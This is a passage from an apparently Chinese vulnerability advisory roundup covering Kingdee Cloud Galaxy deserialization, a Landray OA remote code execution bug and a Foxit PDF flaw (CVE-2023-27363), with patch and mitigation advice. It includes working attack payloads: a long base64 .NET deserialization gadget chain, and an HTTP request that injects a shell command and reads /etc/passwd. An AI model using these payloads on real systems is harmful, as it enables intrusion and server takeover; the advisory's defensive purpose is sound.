AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"}
修复建议
目前官方已发布安全补丁,受影响用户可以联系官方获取补丁。
https://vip.kingdee.com/knowledge/specialDetail/352491453127123200?category
=352491970117034240&id=388994085535220992&productLineId=1
缓解方案:
对于低于 PT123230 [6.2.1012.4]版本的金蝶云星空:
请禁止把金蝶云星空管理中心发布到公网访问,并使用防火墙设置能访问管理中心的 IP 白名单。如有需要发布到外网,或内网需要访问管理中心,可设置白名单进行控制,详情可参考:
https://vip.kingdee.com/article/248777993676668672?productLineId=1&isKnow
ledge=2
39、蓝凌 oa 远程代码执行漏洞
蓝凌 OA sysSearchMain.do 文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件。
漏洞标签:涉及重点系统、国产办公系统、服务器权限相关
漏洞编号:无
漏洞类型:RCE
受影响版本:
-
未知
利用方法:
poc
文件上传 漏洞路径:/sys/ui/extend/varkind/custom.jsp,访问后抓包,在body中加入payload:var={“body”:{“file”:“file:///etc/passwd”}},发送post请求公式编辑器RCE 漏洞路径:/data/sys-common/treexml.tmpl、 /sys/common/dataxml.jsp、 /sys/common/treexml.jsp、 /sys/common/treejson.jsp、 /sys/common/datajson.jsp、 /data/sys-common/dataxml、 /data/sys-common/treexml、 /data/sys-common/datajsonpayload:POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: test.comContent-Type: application/x-www-form-urlencodedContent-Length:176
var={"body":{"file":"/data/sys-common/datajson"}}&s_bean=sysFormulaValidateByJS&script=new java.lang.ProcessBuilder['(java.lang.String[])'](['sh','-c','touch /tmp/1']).start();
修复建议
及时更新到最新版本。
40、Foxit PDF Reader 及 Editor 任意代码执行漏洞
Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。
漏洞标签:涉及重点系统、社会工程学攻击、利用条件简单
漏洞编号:CVE-2023-27363
漏洞类型:RCE
受影响版本:
-
Foxit PDF Reader <= 12.1.1.15289 -
Foxit PDF Editor 12.x <= 12.1.1.15289 -
Foxit PDF Editor 11.x <= 11.2.5.53785 -
Foxit PDF Editor <= 10.1.11.37866
利用方法:
poc
https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363
修复建议
目前官方已发布可更新版本,受影响用户可通过以下任一步骤进行更新:
1、在 Foxit PDF 阅读器或 Foxit PDF 编辑器中,点击“帮助”>“关于 Foxit PDF阅读器”或“关于 Foxit PDF 编辑器”>“检查更新”(对于 10 版本或更早的版本,点击“帮助”>“检查更新”)以更新到最新版本。
2、手动下载更新:
https://www.foxit.com/downloads/
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论